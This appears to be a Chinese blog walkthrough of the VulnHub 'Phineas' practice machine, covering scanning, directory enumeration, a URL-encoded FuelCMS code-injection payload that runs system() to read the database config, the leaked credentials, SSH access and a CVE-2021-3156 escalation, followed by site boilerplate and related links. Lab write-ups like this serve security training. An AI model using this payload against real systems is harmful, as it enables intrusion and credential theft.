phineas靶机复现

Angeline_阳

于 2025-03-28 09:13:03 发布

阅读量261

点赞数 4

文章标签：网络安全

本文链接：https://blog.csdn.net/2201_75458124/article/details/146583667

版权

1.信息收集

arp-scan -l

ip 为192.168.48.154

2.端口扫描

nmap  -sS -sV -P -O 192.168.48.154

发现开放22,80,111,3306端口

3.目录扫描

dirb http://192.168.48.154

发现扫不到

尝试使用kali的自带字典扫描

dirsearch -u http:/192.168.48.154 -e* -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

扫到了/structure

4.访问页面

80端口

http://192.168.48.154/structure

发现没有什么东西

继续扫描

dirb http://192.168.48.154/structure

发现目录下存在一个robots.txt文件

访问：http://192.168.48.154/structure/fuel/

对http://192.168.48.154/structure/fuel 进行扫描

发现http://192.168.48.154/structure/fuel/application/ 可以访问

访问http://192.168.48.154/structure/index.php/fuel

尝试读取数据库文件

http://192.168.48.154/structure/index.php/fuel/pages/select/?filter=%27%2Bpi(print(%24a%3D%27system%27))%2B%24a('cat ./fuel/application/config/database.php')%2B%27

查看页面源代码

发现数据库用户：annaanna'username' => 'anna',

'username => 'anna',

'password' => 'H993hfkNNid5kk'

ssh登录

在desktop上有一个文件

提权

搜索search cve-2021-3156

自动生成一个msf用户

密码miapbpfaattcyse

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Angeline_阳

关注关注

4
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

vulnhub靶场PHINEAS: 1实战记录

aoke79的博客

08-09

1545

vulnhub靶场PHINEAS: 1实战记录

VulnHub打靶记录——phineas

未完成的歌~的博客

03-04

587

靶机下载地址：https://download.vulnhub.com/phineas/Phineas.ova将靶机设置为NAT模式并启动。

参与评论您还未登录，请先登录后发表或查看评论

【Vulnhub Phineas靶场】

一纸荒芜的博客

05-10

1578

Vulnhub Phineas靶场渗透

Vulnhub_Phineas

weixin_63960760的博客

08-21

164

因为靶场使用Vm8网卡，所以在Vm8网段中搜索存活主机得到在此网段中存活的主机，筛选后得到靶场的IP地址为192.168.175.131。

HTB靶场系列 Windows靶机 Slio靶机

m0_57221101的博客

01-27

3523

这台机器涉及到了oracle数据库，之前完全没有涉猎过，借此机会也是熟悉了一下这个数据库的操作方法；以及涉及到了关于内存取证方面的知识，正好上一次在美亚杯只是粗浅的学习了一下取证大师，则此也是借此机会好好的学习了一下取证相关知识勘探 nmap -sC -sV 10.10.10.82 Starting Nmap 7.91 ( https://nmap.org ) at 2021-02-09 13:15 CST Nmap scan report for 10.10.10.82 Host is up (0

vulnhub靶机Phineas

m0_73248913的博客

12-10

566

vulnhub靶机

FigDraw 13. SCI 文章绘图之桑葚图及文章复现（Sankey）

weixin_41368414的博客

07-06

2518

SCI 文章绘图之桑葚图及文章复现（Sankey）

你知道什么是桑基图？

bisal的专栏

09-30

点击标题下「蓝色微信名」可快速关注前几天，朋友提到一种数据统计分析的图类型——桑基图，确实之前了解比较少，找了一些资料，学习了解下。桑基图是一种图表类型，用于可视化流量、能量、资源或数量的流动。它通过使用有向箭头连接不同的节点来显示流动的路径和量级。桑基图常用于可持续能源、物流、人口流动、资源分配等领域的数据可视化。它可以帮助用户直观地理解和分析复杂的流动和关系，从而支持决策和策划过程。桑基图的创...

蓝桥云课ROS机器人发布5年啦（原实验楼ROS机器人在线云实践课程）

zhangrelay的专栏

03-23

3010

在2017年春开发了这款课程，到2022年春已经5年了，并在近期逐步在博客公开了课程的扩展功能。当然这些工作都在2019年之前完成测试工作，后续全力转入ROS2课程及其相关应用型课程中。感谢易科机器人实验室，感谢实验楼，感谢蓝桥云课，使这款免费的ROS云实践平台得以诞生并延续至今。个人也深深感受到开发一款“中性”课程难，维护一款“中性”课程更难。希望课程能给大家一个客观的视角看待ROS机器人及其文档，因此也并没有过多加入个人主观陈述。这并不是一款容易学习的在线课程，但对于机器人相关方向的

Phineas:L10n仪表板

05-25

"Phineas:L10n仪表板"是一个用于项目管理和本地化工作的开源工具。这个工具主要设计用于帮助团队高效地管理全球化（Globalization）和本地化（Localization，简称L10n）流程，确保软件、网站或其他数字产品的内容...

Phineas and Ferb Wallpapers New Tab-crx插件

04-06

如果您是，我们的Phineas and Ferb扩展程序将非常适合您，因为它提供了不同的背景，每次您打开它时都会显示出来。它带有各种高品质的壁纸，这将使您的浏览器超级有趣且丰富多彩。除此之外，我们还添加了一些其他...

一文解读，网络安全行业人才需求情况《网络安全产业人才发展报告》

weixin_59086772的博客

10-18

8683

随着近几天国家网络安全宣传周在全国各地开展活动，网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里，惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何？该怎么提升自我能力，更快地加入网安行列。今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。一、网络安全行业市场发展情况网络时代生活越来越离不开网络，与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障，个人和企业等重.

少儿编程scratch项目源代码文件案例素材-我的世界 3D模型.zip

04-29

少儿编程scratch项目源代码文件案例素材-我的世界 3D模型.zip

少儿编程scratch项目源代码文件案例素材-影子.zip

04-29

少儿编程scratch项目源代码文件案例素材-影子.zip

基于运动学模型的MPC轨迹跟踪算法纯Matlab实现与解析

04-29

内容概要：本文详细介绍了基于运动学模型的模型预测控制（MPC）轨迹跟踪算法的纯Matlab实现方法。首先定义了差速驱动机器人的运动学模型，然后通过构建优化问题并利用fmincon函数求解最优控制输入。文中还讨论了代价函数的设计，包括状态误差和控制量的变化率惩罚项，以及如何生成参考轨迹进行仿真测试。最后给出了常见的仿真问题及其解决方案，并展示了如何通过可视化工具评估跟踪效果。适合人群：对移动机器人控制感兴趣的科研人员、研究生及具有一定Matlab编程基础的工程师。使用场景及目标：适用于需要理解和实现基于运动学模型的MPC轨迹跟踪算法的研究项目或工程应用。目标是掌握MPC的基本原理及其在Matlab环境下的具体实现步骤，能够独立完成从建模到仿真的全过程。其他说明：本文不仅提供了完整的代码实现，还深入浅出地解释了每个关键环节背后的理论依据和技术细节，帮助读者更好地理解MPC的工作机制。同时，文中提到的一些技巧如控制量变化率惩罚项的应用，对于提高算法性能具有重要指导意义。

少儿编程scratch项目源代码文件案例素材-小鸟冒险.zip

04-29

少儿编程scratch项目源代码文件案例素材-小鸟冒险.zip

scratch少儿编程逻辑思维游戏源码-经典游戏.zip

04-29

scratch少儿编程逻辑思维游戏源码-经典游戏.zip

少儿编程scratch项目源代码文件案例素材-烟花效果.zip

04-29

少儿编程scratch项目源代码文件案例素材-烟花效果.zip

房地产 -前策标准化-沪浙一部.pptx